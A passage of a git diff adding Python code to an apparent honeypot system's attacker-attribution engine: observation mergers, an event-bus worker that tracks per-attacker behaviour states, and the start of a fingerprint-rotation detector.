|
||||||
|
primitives do.
|
||||||
|
|
||||||
|
``current_value`` is the most recent hash. Confidence is
|
||||||
|
``1 / (1 + rotations_in_window)`` — one rotation halves
|
||||||
|
confidence, two thirds it, etc.
|
||||||
|
"""
|
||||||
|
n = len(observations)
|
||||||
|
if n == 0:
|
||||||
|
return _unknown(0.0, count=0)
|
||||||
|
last_ts = float(observations[-1].get("ts", 0.0))
|
||||||
|
last_value = observations[-1].get("value")
|
||||||
|
|
||||||
|
window_start = last_ts - _T.HASH_DRIFT_WINDOW_SECS
|
||||||
|
in_window = [
|
||||||
|
o for o in observations
|
||||||
|
if float(o.get("ts", 0.0)) >= window_start
|
||||||
|
]
|
||||||
|
distinct = len({o.get("value") for o in in_window if o.get("value") is not None})
|
||||||
|
rotations = max(0, distinct - 1)
|
||||||
|
confidence = 1.0 / (1.0 + rotations)
|
||||||
|
|
||||||
|
if rotations == 0:
|
||||||
|
state = "stable"
|
||||||
|
elif rotations <= _T.HASH_DRIFT_MAX:
|
||||||
|
state = "drifting"
|
||||||
|
else:
|
||||||
|
state = "conflicted"
|
||||||
|
|
||||||
|
return AttributionState(
|
||||||
|
current_value=last_value,
|
||||||
|
state=state,
|
||||||
|
confidence=confidence,
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _ewma(values: Sequence[float], alpha: float) -> float:
|
||||||
|
"""Single-pass EWMA. Empty input is illegal; callers gate on
|
||||||
|
``MIN_OBSERVATIONS_FOR_STATE`` upstream."""
|
||||||
|
it = iter(values)
|
||||||
|
smoothed = next(it)
|
||||||
|
for v in it:
|
||||||
|
smoothed = alpha * v + (1.0 - alpha) * smoothed
|
||||||
|
return smoothed
|
||||||
|
|
||||||
|
|
||||||
|
def _coef_of_variation(values: Sequence[float], mean: float) -> float:
|
||||||
|
"""Population-style CV = stdev / |mean|. Returns 0 on a constant
|
||||||
|
signal; returns +inf-equivalent (1e9) when the mean is exactly
|
||||||
|
zero and the signal isn't constant — so the conflicted threshold
|
||||||
|
fires without us having to special-case it upstream."""
|
||||||
|
if not values:
|
||||||
|
return 0.0
|
||||||
|
diffs_sq = [(v - mean) ** 2 for v in values]
|
||||||
|
variance = sum(diffs_sq) / len(values)
|
||||||
|
stdev = variance ** 0.5
|
||||||
|
if mean == 0:
|
||||||
|
return 0.0 if stdev == 0 else 1e9
|
||||||
|
return stdev / abs(mean)
|
||||||
|
|
||||||
|
|
||||||
|
def _safe_float(value: Any) -> float:
|
||||||
|
"""Defensive coercion — observations may carry value=None on
|
||||||
|
unknown-emitter primitives. Treat None as 0.0; the dispersion
|
||||||
|
check will surface the resulting flat baseline as 'stable'
|
||||||
|
which is the honest answer for a single-observation primitive
|
||||||
|
that hasn't fired yet."""
|
||||||
|
if value is None:
|
||||||
|
return 0.0
|
||||||
|
if isinstance(value, bool):
|
||||||
|
return 1.0 if value else 0.0
|
||||||
|
return float(value)
|
||||||
|
|
||||||
|
|
||||||
|
def aggregate_categorical(
|
||||||
|
observations: Sequence[dict[str, Any]],
|
||||||
|
) -> AttributionState:
|
||||||
|
"""Categorical merger — the dominant case for BEHAVE-SHELL.
|
||||||
|
|
||||||
|
Compares the recent N-window against the older N-window. With
|
||||||
|
``CATEGORICAL_WINDOW_N = 5`` and ``CATEGORICAL_MAJORITY_THRESHOLD
|
||||||
|
= 4``:
|
||||||
|
|
||||||
|
* fewer than ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
|
||||||
|
* recent window has a clear majority + matches older window → ``stable``
|
||||||
|
* recent window has a clear majority + differs from older window → ``drifting``
|
||||||
|
* recent window split + alternation pattern across observations → ``multi_actor``
|
||||||
|
* recent window split + no alternation → ``conflicted``
|
||||||
|
|
||||||
|
Confidence is the recent-window agreement ratio; ``multi_actor``
|
||||||
|
is capped at ``MULTI_ACTOR_MAX_CONFIDENCE``. The merger returns
|
||||||
|
the most-recent observation's value as ``current_value``
|
||||||
|
regardless of state — the dashboard wants a value to render
|
||||||
|
even on ``conflicted`` rows.
|
||||||
|
"""
|
||||||
|
n = len(observations)
|
||||||
|
last_ts = float(observations[-1].get("ts", 0.0))
|
||||||
|
last_value = observations[-1].get("value")
|
||||||
|
if n < _T.MIN_OBSERVATIONS_FOR_STATE:
|
||||||
|
return AttributionState(
|
||||||
|
current_value=last_value,
|
||||||
|
state="unknown",
|
||||||
|
confidence=0.0,
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
|
||||||
|
window = _T.CATEGORICAL_WINDOW_N
|
||||||
|
recent = observations[-window:]
|
||||||
|
recent_values = [o.get("value") for o in recent]
|
||||||
|
recent_count = Counter(recent_values)
|
||||||
|
top_value, top_count = recent_count.most_common(1)[0]
|
||||||
|
recent_size = len(recent)
|
||||||
|
confidence = top_count / recent_size
|
||||||
|
|
||||||
|
is_recent_clear = top_count >= min(
|
||||||
|
_T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size,
|
||||||
|
)
|
||||||
|
|
||||||
|
if not is_recent_clear:
|
||||||
|
# Split recent window. Distinguish multi_actor (alternation)
|
||||||
|
# from random conflict.
|
||||||
|
if _is_alternation(observations):
|
||||||
|
return AttributionState(
|
||||||
|
current_value=last_value,
|
||||||
|
state="multi_actor",
|
||||||
|
confidence=min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
return AttributionState(
|
||||||
|
current_value=last_value,
|
||||||
|
state="conflicted",
|
||||||
|
confidence=confidence,
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Recent window has a clear majority. Compare to the prior
|
||||||
|
# window to decide stable vs drifting.
|
||||||
|
older = observations[-2 * window: -window]
|
||||||
|
if not older:
|
||||||
|
# Only one window's worth of data — call it stable. The
|
||||||
|
# dashboard already gates "unknown" on
|
||||||
|
# MIN_OBSERVATIONS_FOR_STATE so this branch is reachable
|
||||||
|
# only when the operator has produced enough observations
|
||||||
|
# for one full window but not two.
|
||||||
|
return AttributionState(
|
||||||
|
current_value=top_value,
|
||||||
|
state="stable",
|
||||||
|
confidence=confidence,
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
|
||||||
|
older_values = [o.get("value") for o in older]
|
||||||
|
older_count = Counter(older_values)
|
||||||
|
older_top_value, older_top_count = older_count.most_common(1)[0]
|
||||||
|
older_size = len(older)
|
||||||
|
older_clear = older_top_count >= min(
|
||||||
|
_T.CATEGORICAL_MAJORITY_THRESHOLD, older_size,
|
||||||
|
)
|
||||||
|
|
||||||
|
if not older_clear:
|
||||||
|
# Older window was itself conflicted; we just stabilised.
|
||||||
|
# That's drift in the colloquial sense — the attacker
|
||||||
|
# converged onto a single behaviour.
|
||||||
|
return AttributionState(
|
||||||
|
current_value=top_value,
|
||||||
|
state="drifting",
|
||||||
|
confidence=confidence,
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
|
||||||
|
if older_top_value != top_value:
|
||||||
|
return AttributionState(
|
||||||
|
current_value=top_value,
|
||||||
|
state="drifting",
|
||||||
|
confidence=confidence,
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
return AttributionState(
|
||||||
|
current_value=top_value,
|
||||||
|
state="stable",
|
||||||
|
confidence=confidence,
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
|
||||||
|
"""Heuristic: do recent observations alternate between two values
|
||||||
|
(operator A → B → A → B), as opposed to random thrashing?
|
||||||
|
|
||||||
|
Conservative: requires at least 4 observations in the window,
|
||||||
|
exactly 2 distinct values, and that flips outnumber repeats by
|
||||||
|
at least 2:1. ATTRIBUTION-ENGINE.md §"Open question 1" warns
|
||||||
|
that flapping primitives on flaky networks look like two
|
||||||
|
operators; this guard is what keeps the false-positive rate down.
|
||||||
|
"""
|
||||||
|
window = _T.CATEGORICAL_WINDOW_N
|
||||||
|
recent = observations[-window:]
|
||||||
|
if len(recent) < 4:
|
||||||
|
return False
|
||||||
|
values = [o.get("value") for o in recent]
|
||||||
|
distinct = set(values)
|
||||||
|
if len(distinct) != 2:
|
||||||
|
return False
|
||||||
|
flips = sum(
|
||||||
|
1 for i in range(1, len(values)) if values[i] != values[i - 1]
|
||||||
|
)
|
||||||
|
repeats = (len(values) - 1) - flips
|
||||||
|
return flips >= 2 * max(repeats, 1)
|
||||||
|
|
||||||
|
|
||||||
|
def _unknown(last_ts: float, *, count: int) -> AttributionState:
|
||||||
|
return AttributionState(
|
||||||
|
current_value=None,
|
||||||
|
state="unknown",
|
||||||
|
confidence=0.0,
|
||||||
|
observation_count=count,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
394
decnet/correlation/attribution_worker.py
Normal file
394
decnet/correlation/attribution_worker.py
Normal file
@@ -0,0 +1,394 @@
|
|||||||
|
"""Attribution-engine bus subscriber — v0 Phase 1 skeleton.
|
||||||
|
|
||||||
|
Subscribes to ``attacker.observation.>`` and, for each event, ensures
|
||||||
|
the source attacker has a stub identity in ``attacker_identities``.
|
||||||
|
Phase 1 does **not** invoke the merger or write
|
||||||
|
``attribution_state`` rows; that wiring lands in Phase 4 once the
|
||||||
|
Phase 2/3 mergers are in.
|
||||||
|
|
||||||
|
Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe
|
||||||
|
with a wake event, fall back to poll-only if the bus is unavailable,
|
||||||
|
publish derived events with :func:`publish_safely`, log per-handler
|
||||||
|
exceptions and continue.
|
||||||
|
|
||||||
|
Trigger isolation: the per-event handler is wrapped in a single
|
||||||
|
try/except. Any exception is logged and the loop continues with the
|
||||||
|
next event. This is the same posture BEHAVE-SHELL's
|
||||||
|
``_handler.handle_session_ended`` adopts.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import contextlib
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
from decnet.bus import topics as _topics
|
||||||
|
from decnet.bus.base import BaseBus
|
||||||
|
from decnet.bus.factory import get_bus
|
||||||
|
from decnet.bus.publish import (
|
||||||
|
publish_safely,
|
||||||
|
run_control_listener_signal as _run_control_listener_signal,
|
||||||
|
run_health_heartbeat as _run_health_heartbeat,
|
||||||
|
)
|
||||||
|
from decnet.correlation.attribution import _thresholds as _T
|
||||||
|
from decnet.correlation.attribution.aggregate import aggregate_observations
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
|
try:
|
||||||
|
from behave_shell.spec import (
|
||||||
|
PRIMITIVE_REGISTRY,
|
||||||
|
ValueKind,
|
||||||
|
)
|
||||||
|
_BEHAVE_REGISTRY_AVAILABLE = True
|
||||||
|
except ImportError: # pragma: no cover
|
||||||
|
PRIMITIVE_REGISTRY = {}
|
||||||
|
ValueKind = None
|
||||||
|
_BEHAVE_REGISTRY_AVAILABLE = False
|
||||||
|
|
||||||
|
log = get_logger("correlation.attribution_worker")
|
||||||
|
|
||||||
|
_WORKER_NAME = "attribution"
|
||||||
|
_OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
|
||||||
|
|
||||||
|
|
||||||
|
async def run_attribution_loop(
|
||||||
|
repo: BaseRepository,
|
||||||
|
*,
|
||||||
|
shutdown: asyncio.Event | None = None,
|
||||||
|
multi_actor_tick_secs: float | None = None,
|
||||||
|
) -> None:
|
||||||
|
"""Run the attribution worker until cancelled.
|
||||||
|
|
||||||
|
Three concurrent tasks under one supervisor:
|
||||||
|
|
||||||
|
1. ``_consume_observations`` — bus subscription on
|
||||||
|
``attacker.observation.>``; per-event handler upserts state.
|
||||||
|
2. ``_multi_actor_tick`` — periodic walk of ``attribution_state``
|
||||||
|
firing ``attribution.profile.multi_actor_suspected`` when an
|
||||||
|
identity carries ≥ ``MULTI_ACTOR_MIN_PRIMITIVES`` rows in
|
||||||
|
``multi_actor`` state. Phase 5.
|
||||||
|
3. Health + control standard channels.
|
||||||
|
|
||||||
|
*shutdown* is an optional external stop signal.
|
||||||
|
*multi_actor_tick_secs* overrides ``_thresholds.MULTI_ACTOR_TICK_SECS``
|
||||||
|
(tests use this to drive the correlator without sleeping for a
|
||||||
|
minute).
|
||||||
|
"""
|
||||||
|
log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)
|
||||||
|
|
||||||
|
bus: BaseBus | None = None
|
||||||
|
sub_task: asyncio.Task | None = None
|
||||||
|
tick_task: asyncio.Task | None = None
|
||||||
|
heartbeat_task: asyncio.Task | None = None
|
||||||
|
control_task: asyncio.Task | None = None
|
||||||
|
tick_secs = (
|
||||||
|
multi_actor_tick_secs
|
||||||
|
if multi_actor_tick_secs is not None
|
||||||
|
else _T.MULTI_ACTOR_TICK_SECS
|
||||||
|
)
|
||||||
|
try:
|
||||||
|
candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
|
||||||
|
await candidate.connect()
|
||||||
|
bus = candidate
|
||||||
|
sub_task = asyncio.create_task(
|
||||||
|
_consume_observations(bus, repo),
|
||||||
|
)
|
||||||
|
tick_task = asyncio.create_task(
|
||||||
|
_multi_actor_tick_loop(bus, repo, tick_secs),
|
||||||
|
)
|
||||||
|
heartbeat_task = asyncio.create_task(
|
||||||
|
_run_health_heartbeat(bus, _WORKER_NAME),
|
||||||
|
)
|
||||||
|
control_task = asyncio.create_task(
|
||||||
|
_run_control_listener_signal(bus, _WORKER_NAME),
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"attribution worker: bus unavailable, idle until bus returns: %s",
|
||||||
|
exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
if shutdown is None:
|
||||||
|
shutdown = asyncio.Event()
|
||||||
|
|
||||||
|
try:
|
||||||
|
await shutdown.wait()
|
||||||
|
except (asyncio.CancelledError, KeyboardInterrupt):
|
||||||
|
log.info("attribution worker stopped")
|
||||||
|
finally:
|
||||||
|
for task in (sub_task, tick_task, heartbeat_task, control_task):
|
||||||
|
if task is None:
|
||||||
|
continue
|
||||||
|
task.cancel()
|
||||||
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
|
await task
|
||||||
|
if bus is not None:
|
||||||
|
with contextlib.suppress(Exception):
|
||||||
|
await bus.close()
|
||||||
|
|
||||||
|
|
||||||
|
async def _consume_observations(
|
||||||
|
bus: BaseBus, repo: BaseRepository,
|
||||||
|
) -> None:
|
||||||
|
"""Pull events off ``attacker.observation.>`` and dispatch each
|
||||||
|
to :func:`handle_observation_event`.
|
||||||
|
|
||||||
|
Per-event exceptions are caught and logged; the subscription
|
||||||
|
survives bad payloads. If the subscription itself dies (bus
|
||||||
|
disconnect), the worker idles — the supervisor systemd unit
|
||||||
|
will restart on a clean exit.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
sub = bus.subscribe(_OBSERVATION_PATTERN)
|
||||||
|
async with sub:
|
||||||
|
async for event in sub:
|
||||||
|
try:
|
||||||
|
await handle_observation_event(bus, repo, event)
|
||||||
|
except Exception: # noqa: BLE001
|
||||||
|
log.exception("attribution worker: handler failed")
|
||||||
|
except asyncio.CancelledError:
|
||||||
|
raise
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"attribution worker: subscriber for %s died (%s)",
|
||||||
|
_OBSERVATION_PATTERN, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def handle_observation_event(
|
||||||
|
bus: BaseBus | None,
|
||||||
|
repo: BaseRepository,
|
||||||
|
event: Any,
|
||||||
|
) -> None:
|
||||||
|
"""Handle one ``attacker.observation.<primitive>`` event.
|
||||||
|
|
||||||
|
Phase 1: ensure the source attacker has a stub identity, then log
|
||||||
|
and return. Phase 4 will: load prior state, run merger, upsert
|
||||||
|
new state, emit ``attribution.profile.state_changed`` on
|
||||||
|
transition.
|
||||||
|
|
||||||
|
*event* is whatever shape :class:`BaseBus`'s subscription yields —
|
||||||
|
a ``BusEvent`` with ``payload`` (dict) and ``event_type`` (str)
|
||||||
|
fields. The payload carries the BEHAVE envelope plus DECNET-side
|
||||||
|
``attacker_uuid`` denorm (see
|
||||||
|
``decnet.profiler.behave_shell._handler._publish_observation``).
|
||||||
|
"""
|
||||||
|
payload = _payload_of(event)
|
||||||
|
attacker_uuid = payload.get("attacker_uuid")
|
||||||
|
primitive = payload.get("primitive")
|
||||||
|
if not attacker_uuid or not primitive:
|
||||||
|
log.debug(
|
||||||
|
"attribution worker: skipping malformed event (uuid=%r primitive=%r)",
|
||||||
|
attacker_uuid, primitive,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
identity_uuid = await repo.ensure_stub_identity_for_attacker(
|
||||||
|
str(attacker_uuid),
|
||||||
|
)
|
||||||
|
if identity_uuid is None:
|
||||||
|
log.info(
|
||||||
|
"attribution worker: no Attacker row for uuid=%s yet; deferring",
|
||||||
|
attacker_uuid,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
primitive_str = str(primitive)
|
||||||
|
|
||||||
|
# Load the full per-(identity, primitive) observation series.
|
||||||
|
# v0 with 1:1 stub identities, this is the single attacker's
|
||||||
|
# series; v1's clusterer makes it a cross-attacker union.
|
||||||
|
observations = await repo.observations_for_identity_primitive(
|
||||||
|
identity_uuid, primitive_str,
|
||||||
|
)
|
||||||
|
if not observations:
|
||||||
|
log.debug(
|
||||||
|
"attribution worker: no observations yet for identity=%s "
|
||||||
|
"primitive=%s (race with upsert)",
|
||||||
|
identity_uuid, primitive_str,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
|
||||||
|
# Run merger.
|
||||||
|
value_kind = _value_kind_for(primitive_str)
|
||||||
|
new_state = aggregate_observations(observations, value_kind=value_kind)
|
||||||
|
|
||||||
|
# Load prior state to detect transitions.
|
||||||
|
prior = await repo.get_attribution_state(identity_uuid, primitive_str)
|
||||||
|
state_changed = prior is None or prior.get("state") != new_state.state
|
||||||
|
|
||||||
|
# Persist. last_change_ts is locked to the prior row when state is
|
||||||
|
# unchanged so the dashboard's "stable since" timestamp doesn't
|
||||||
|
# reset on every observation.
|
||||||
|
if prior is not None and not state_changed:
|
||||||
|
last_change_ts = float(prior.get("last_change_ts", new_state.last_observation_ts))
|
||||||
|
else:
|
||||||
|
last_change_ts = new_state.last_observation_ts
|
||||||
|
await repo.upsert_attribution_state({
|
||||||
|
"identity_uuid": identity_uuid,
|
||||||
|
"primitive": primitive_str,
|
||||||
|
"current_value": new_state.current_value,
|
||||||
|
"state": new_state.state,
|
||||||
|
"confidence": new_state.confidence,
|
||||||
|
"observation_count": new_state.observation_count,
|
||||||
|
"last_change_ts": last_change_ts,
|
||||||
|
"last_observation_ts": new_state.last_observation_ts,
|
||||||
|
})
|
||||||
|
|
||||||
|
# Emit state_changed only on transition. Idempotent re-runs (same
|
||||||
|
# observations, same merger output) produce no event — matches
|
||||||
|
# the loop-prevention invariant that ttp.tagged uses.
|
||||||
|
if state_changed and bus is not None:
|
||||||
|
await publish_safely(
|
||||||
|
bus,
|
||||||
|
_topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
|
||||||
|
{
|
||||||
|
"identity_uuid": identity_uuid,
|
||||||
|
"primitive": primitive_str,
|
||||||
|
"old_state": prior.get("state") if prior else None,
|
||||||
|
"new_state": new_state.state,
|
||||||
|
"current_value": new_state.current_value,
|
||||||
|
"confidence": new_state.confidence,
|
||||||
|
"observation_count": new_state.observation_count,
|
||||||
|
"ts": new_state.last_observation_ts,
|
||||||
|
},
|
||||||
|
event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
|
||||||
|
)
|
||||||
|
log.info(
|
||||||
|
"attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
|
||||||
|
identity_uuid, primitive_str,
|
||||||
|
(prior or {}).get("state") or "<new>", new_state.state,
|
||||||
|
new_state.confidence,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _value_kind_for(primitive: str) -> str:
|
||||||
|
"""Resolve a BEHAVE primitive name to the merger's ValueKind tag.
|
||||||
|
|
||||||
|
Maps the BEHAVE registry's ``ValueKind`` enum onto the three
|
||||||
|
mergers the engine ships:
|
||||||
|
|
||||||
|
* ``CATEGORICAL`` / ``BOOL`` / ``FREE_STRING`` / ``ARRAY`` →
|
||||||
|
``"categorical"`` (BOOL is a 2-cardinality categorical;
|
||||||
|
FREE_STRING and ARRAY collapse to opaque-token categorical
|
||||||
|
until a v1 specialised merger lands)
|
||||||
|
* ``NUMERIC`` → ``"numeric"``
|
||||||
|
* ``HASH`` → ``"hash"``
|
||||||
|
|
||||||
|
Unknown primitives (registry miss) default to categorical — the
|
||||||
|
safest fallback because the categorical merger is one-outlier-
|
||||||
|
tolerant and won't lie about confidence on noisy categorical
|
||||||
|
data the way a numeric merger would on non-numeric values.
|
||||||
|
"""
|
||||||
|
if not _BEHAVE_REGISTRY_AVAILABLE:
|
||||||
|
return "categorical"
|
||||||
|
spec = PRIMITIVE_REGISTRY.get(primitive)
|
||||||
|
if spec is None or ValueKind is None:
|
||||||
|
return "categorical"
|
||||||
|
if spec.kind is ValueKind.NUMERIC:
|
||||||
|
return "numeric"
|
||||||
|
if spec.kind is ValueKind.HASH:
|
||||||
|
return "hash"
|
||||||
|
return "categorical"
|
||||||
|
|
||||||
|
|
||||||
|
def _payload_of(event: Any) -> dict[str, Any]:
|
||||||
|
"""Extract the dict payload from a BusEvent or fall through if
|
||||||
|
*event* is already a dict (test fixtures may pass either)."""
|
||||||
|
payload = getattr(event, "payload", event)
|
||||||
|
return payload if isinstance(payload, dict) else {}
|
||||||
|
|
||||||
|
|
||||||
|
async def _multi_actor_tick_loop(
|
||||||
|
bus: BaseBus, repo: BaseRepository, interval_secs: float,
|
||||||
|
) -> None:
|
||||||
|
"""Walk ``attribution_state`` every *interval_secs* and emit
|
||||||
|
``attribution.profile.multi_actor_suspected`` for any identity
|
||||||
|
whose multi_actor primitives changed since the last tick.
|
||||||
|
|
||||||
|
Dedupe: in-memory ``last_fired`` map keyed on identity_uuid →
|
||||||
|
frozenset(primitives). Same primitive set as last fire → no
|
||||||
|
re-emit. New primitive joining the set → re-emit. Set shrinks
|
||||||
|
below ``MULTI_ACTOR_MIN_PRIMITIVES`` → drop the entry so it
|
||||||
|
re-arms.
|
||||||
|
|
||||||
|
In-memory dedup is honest for v0 — restart-resets are
|
||||||
|
acceptable because the underlying ``attribution_state`` rows
|
||||||
|
persist; on first tick after restart we re-emit the current
|
||||||
|
set. v1 may persist a ``multi_actor_suspect_log`` table.
|
||||||
|
"""
|
||||||
|
last_fired: dict[str, frozenset[str]] = {}
|
||||||
|
try:
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
await tick_multi_actor(bus, repo, last_fired)
|
||||||
|
except Exception: # noqa: BLE001
|
||||||
|
log.exception("attribution worker: multi_actor tick failed")
|
||||||
|
await asyncio.sleep(interval_secs)
|
||||||
|
except asyncio.CancelledError:
|
||||||
|
raise
|
||||||
|
|
||||||
|
|
||||||
|
async def tick_multi_actor(
|
||||||
|
bus: BaseBus | None,
|
||||||
|
repo: BaseRepository,
|
||||||
|
last_fired: dict[str, frozenset[str]],
|
||||||
|
) -> int:
|
||||||
|
"""One pass of the cross-primitive correlator. Public for tests.
|
||||||
|
|
||||||
|
Returns the number of ``multi_actor_suspected`` events emitted.
|
||||||
|
"""
|
||||||
|
candidates = await repo.list_multi_actor_identities()
|
||||||
|
fired = 0
|
||||||
|
seen_now: set[str] = set()
|
||||||
|
for entry in candidates:
|
||||||
|
identity_uuid = str(entry["identity_uuid"])
|
||||||
|
primitives: list[str] = sorted(entry.get("primitives") or [])
|
||||||
|
seen_now.add(identity_uuid)
|
||||||
|
if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
|
||||||
|
# Repo already filters to >= 2 today; defensive against
|
||||||
|
# future schema drift.
|
||||||
|
continue
|
||||||
|
signature = frozenset(primitives)
|
||||||
|
if last_fired.get(identity_uuid) == signature:
|
||||||
|
continue
|
||||||
|
last_fired[identity_uuid] = signature
|
||||||
|
if bus is None:
|
||||||
|
continue
|
||||||
|
await publish_safely(
|
||||||
|
bus,
|
||||||
|
_topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
|
||||||
|
{
|
||||||
|
"identity_uuid": identity_uuid,
|
||||||
|
"primitives": primitives,
|
||||||
|
"evidence_summary": (
|
||||||
|
f"{len(primitives)} primitives flagged multi_actor"
|
||||||
|
),
|
||||||
|
"confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
|
||||||
|
"ts": _now(),
|
||||||
|
},
|
||||||
|
event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
|
||||||
|
)
|
||||||
|
fired += 1
|
||||||
|
log.info(
|
||||||
|
"attribution worker: multi_actor_suspected identity=%s primitives=%s",
|
||||||
|
identity_uuid, primitives,
|
||||||
|
)
|
||||||
|
# Rearm: any identity that was in last_fired but no longer in
|
||||||
|
# candidates dropped below the threshold; remove so the next
|
||||||
|
# qualifying flap re-fires.
|
||||||
|
for stale in [k for k in last_fired if k not in seen_now]:
|
||||||
|
del last_fired[stale]
|
||||||
|
return fired
|
||||||
|
|
||||||
|
|
||||||
|
def _now() -> float:
|
||||||
|
"""Wall-clock seconds. Wrapped so tests can monkeypatch."""
|
||||||
|
import time
|
||||||
|
return time.time()
|
||||||
|
|
||||||
|
|
||||||
|
__all__ = [
|
||||||
|
"run_attribution_loop",
|
||||||
|
"handle_observation_event",
|
||||||
|
"tick_multi_actor",
|
||||||
|
]
|
||||||
153
decnet/correlation/fingerprint_rotation.py
Normal file
153
decnet/correlation/fingerprint_rotation.py
Normal file
@@ -0,0 +1,153 @@
|
|||||||
|
"""Attacker substrate-fingerprint rotation detection.
|
||||||
|
|
||||||
|
Called inline from the prober at each fingerprint emit site. Looks up
|
||||||
|
the last persisted hash for ``(attacker_uuid, port, probe_type)``;
|
||||||
|
when the new hash differs from the last one, emits a derived
|
||||||
|
``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
|
||||||
|
stamps the ``Attacker`` row's rotation telemetry.
|
||||||
|
|
||||||
|
This is a pure library — no daemon, no async loop. The prober is the
|
||||||
|
only producer. We just teach it to derive a second event on hash
|
||||||
|
flip without standing up another worker (DEBT-032).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import uuid as _uuid
|
||||||
|
from dataclasses import dataclass
|
||||||
|
from datetime import datetime
|
||||||
|
from typing import Any, Callable, Literal
|
||||||
|
|
||||||
|
from sqlmodel import Session, select
|
||||||
|
|
||||||
|
from decnet.web.db.models import Attacker, AttackerFingerprintState
|
||||||
|
|
||||||
|
ProbeType = Literal["jarm", "hassh", "tcpfp"]
|
||||||
|
RotationKind = Literal[
|
||||||
|
"no_attacker_row", # caller raced ahead of correlator; skip silently
|
||||||
|
"first_sighting", # state row created, no prior hash
|
||||||
|
"unchanged", # same hash as last sighting
|
||||||
|
"rotated", # hash differs; event emitted, Attacker stamped
|
||||||
|
]
|
||||||
|
|
||||||
|
PublishFn = Callable[[str, dict[str, Any]], None]
|
||||||
|
SyslogFn = Callable[[str, dict[str, Any]], None]
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass
|
||||||
|
class RotationOutcome:
|
||||||
|
"""Return shape of :func:`record_fingerprint`. Caller usually
|
||||||
|
ignores it; useful for tests + tracing."""
|
||||||
|
kind: RotationKind
|
||||||
|
old_hash: str | None
|
||||||
|
new_hash: str
|
||||||
|
rotation_count: int
|
||||||
|
|
||||||
|
|
||||||
|
_ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
|
||||||
|
|
||||||
|
|
||||||
|
def record_fingerprint(
|
||||||
|
session: Session,
|
||||||
|
*,
|
||||||
|
attacker_ip: str,
|
||||||
|
port: int,
|
||||||
|
probe_type: ProbeType,
|
||||||
|
new_hash: str,
|
||||||
|
ts: datetime,
|
||||||
|
publish_fn: PublishFn | None = None,
|
||||||
|
syslog_fn: SyslogFn | None = None,
|
||||||
|
) -> RotationOutcome:
|
||||||
|
"""Upsert state row; on hash diff, emit derived event + stamp.
|
||||||
|
|
||||||
|
Resolves ``attacker_uuid`` from ``attacker_ip`` via the existing
|
||||||
|
Attacker table. If no Attacker row exists yet (the prober raced
|
||||||
|
ahead of the correlator), returns ``kind="no_attacker_row"`` and
|
||||||
|
does nothing — the next probe cycle will pick it up once the
|
||||||
|
correlator has caught up.
|
||||||
|
|
||||||
|
State upsert + Attacker stamp + publish + syslog are committed in
|
||||||
|
one transaction so a partial failure can't desync state from
|
||||||
|
what was emitted.
|
||||||
|
"""
|
||||||
|
attacker = session.exec(
|
||||||
|
select(Attacker).where(Attacker.ip == attacker_ip)
|
||||||
|
).first()
|
||||||
|
if attacker is None:
|
||||||
|
return RotationOutcome(
|
||||||
|
kind="no_attacker_row",
|
||||||
|
old_hash=None,
|
||||||
|
new_hash=new_hash,
|
||||||
|
rotation_count=0,
|
||||||
|
)
|
||||||
|
|
||||||
|
row = session.exec(
|
||||||
|
select(AttackerFingerprintState).where(
|
||||||
|
AttackerFingerprintState.attacker_uuid == attacker.uuid,
|
||||||
|
